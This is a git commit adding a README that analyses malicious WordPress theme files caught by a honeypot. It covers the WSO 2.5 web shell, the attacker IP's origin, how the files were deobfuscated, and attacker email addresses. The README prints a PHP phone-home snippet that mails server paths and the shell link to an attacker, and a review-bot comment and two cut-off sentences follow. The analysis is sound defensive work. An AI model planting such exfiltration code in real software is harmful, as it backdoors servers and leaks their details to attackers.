Rename
bediger4000 committed Jul 10, 2018
1 parent e3e6203 commit 581e15f
Showing 1 changed file with 96 additions and 0 deletions.
96 changes: 96 additions & 0 deletions activex/README.md
@@ -0,0 +1,96 @@
# Kinked theme named activex

A theme with a WSO 2.5 web shell, which itself has a phone-home,
and a

The `webrot.php` file also appears on [pastebin](https://pastebin.com/Md5U41ME),
dated Dec 30, 2013.
Five years floating around.

## Origin

### IP Address 195.142.179.223

IP address 195.142.179.223 has DNS name of host-195-142-179-223.reverse.superonline.net.

host-195-142-179-223.reverse.superonline.net does not have an A record

`geoiplookup` says: GeoIP Country Edition: TR, Turkey

% Information related to '195.142.179.0/24AS34984'
route: 195.142.179.0/24
descr: SOL-BNG
origin: AS34984
mnt-by: MNT-TELLCOM
mnt-routes: MNT-TELLCOM
created: 2014-04-14T13:30:03Z
last-modified: 2014-04-14T13:30:03Z
source: RIPE

MNT-TELLCOM is apparently an ISP in Istanbul.

The last IP address to respond on a traceroute to 195.142.179.223 is 46.33.86.46,
apparently located in Germany.

### Download

Downloaded to a WordPress honey pot as a theme upload.
The attacker(s) sent a zip-format file, which apparently has a
real WordPress theme in it,

All the files have a date of Aug 1, 2013,
except for `webrot.php`
and `images.php`

## Deofbuscation

`images.php` was merely base64-encoded, only one layer of
obfuscation.

`webrot.php` had a more intricate obfuscation,
which it shares with other malware I've caught.
See [A common encoding](../common_encoding) for details.

## Analysis

`images.php` is a Web Shell by oRb (WSO) version 2.5,
complete with a phone-home:

$me=base64_decode("ZmVyaWQyM0BnbWFpbC5jb20=");
$thm="Server";
$fuck="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."\r\n";
$fuck.="Server Admin : ".$_SERVER['SERVER_ADMIN']."\r\n";
$fuck.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."\r\n";
$fuck.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\r\n";
$fuck.="Avlanan Site : " .$_SERVER['HTTP_HOST']."\r\n";
mail($me, $thm, $fuck);

`$me` ends up containing the email address "ferid23@gmail.com".
I see this email address associated with a 2014 [Russian account](https://notessysadmin.com/kak-ayyildiz-team-slomali-moj-blog) of
Turkish hackers Ayyildiz Tim "breaking" a blog.
That reconciles with the Turkish ISP or telecom for the IP address this
attack came from.

At least this is a new phone-home, not just a decoded "wsobuff" from WSO 2.5.1
with a different "to" address. Props to ferid23@gmail.com for that effort.

`webrot.php` is slightly more interesting.

It phones home to mymktmymkt@gmail.com and tokmaktokmak1@gmail.com
with the same information that `images.php` sends to ol' ferid23@gmail.com
tokmaktokmak1@gmail.com appears on a [pastebin](https://pastebin.com/Md5U41ME),
on a [Turkish security site](https://www.turkhackteam.org/web-server-guvenligi/1140416-webr00t-shell-decode.html)
and a few others.

`webrot.php` contains a number of base64-encoded pieces of source:

* Perl file `web.root` - a Perl web shell?
* PHP file `cmd.php`
* PHP file `litebypass.php`
* PHP file `mass.php`
* PHP file `wpindex.php` - Frenchish variable names?

Lots of "coded by WebRooT" comments throughout,
but very uneven coding style and naming conventions.
Some output is Turkish, some is English.
Looks like "WebRooT" put this package together from pre-existing code.
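Review bot: two sentences in this README are cut off mid-thought and the PHP snippet is not fenced, so the rendered page will be hard to follow. The opening paragraph stops at `and a` and the Download paragraph stops at `real WordPress theme in it,`; both need their remaining clause. The phone-home snippet (`$me=base64_decode("ZmVyaWQyM0BnbWFpbC5jb20=");` through `mail($me, $thm, $fuck);`) and the RIPE route object (`route: 195.142.179.0/24` through `source: RIPE`) should each sit in a fenced code block, otherwise Markdown folds them into one paragraph and treats the `_` in `$_SERVER` as emphasis. The heading `## Deofbuscation` should read `## Deobfuscation`. The analysis names `webrot.php` and `images.php` as the malicious files but records no hashes for them; adding their SHA-256 digests next to the file dates would let other honeypot operators match the same samples and would tie this write-up to the pastebin copy mentioned at the top.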
